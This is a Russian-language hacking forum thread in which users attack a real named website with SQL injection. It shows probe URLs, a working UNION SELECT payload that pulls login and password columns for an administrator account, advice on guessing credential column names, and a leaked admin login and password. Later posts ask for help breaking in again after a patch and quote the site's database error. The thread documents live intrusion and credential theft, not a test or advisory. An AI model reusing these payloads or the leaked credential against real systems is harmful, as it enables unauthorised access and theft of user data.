|
http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27 Не выходит выполнить запрос. Что-то быстро они багу та увидали надеюсь всё мирно будет |
Продолжение следует :)
http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/* |
virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась:)
|
login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.
|
Вот на досуге полазал нашол следующее
Administrator ytnvtyz Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........ |
Та же беда
Не пускает. |
Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...
|
Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите... |
http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен выбор идет только по одному INTEGER полю |
| Время: 12:39 |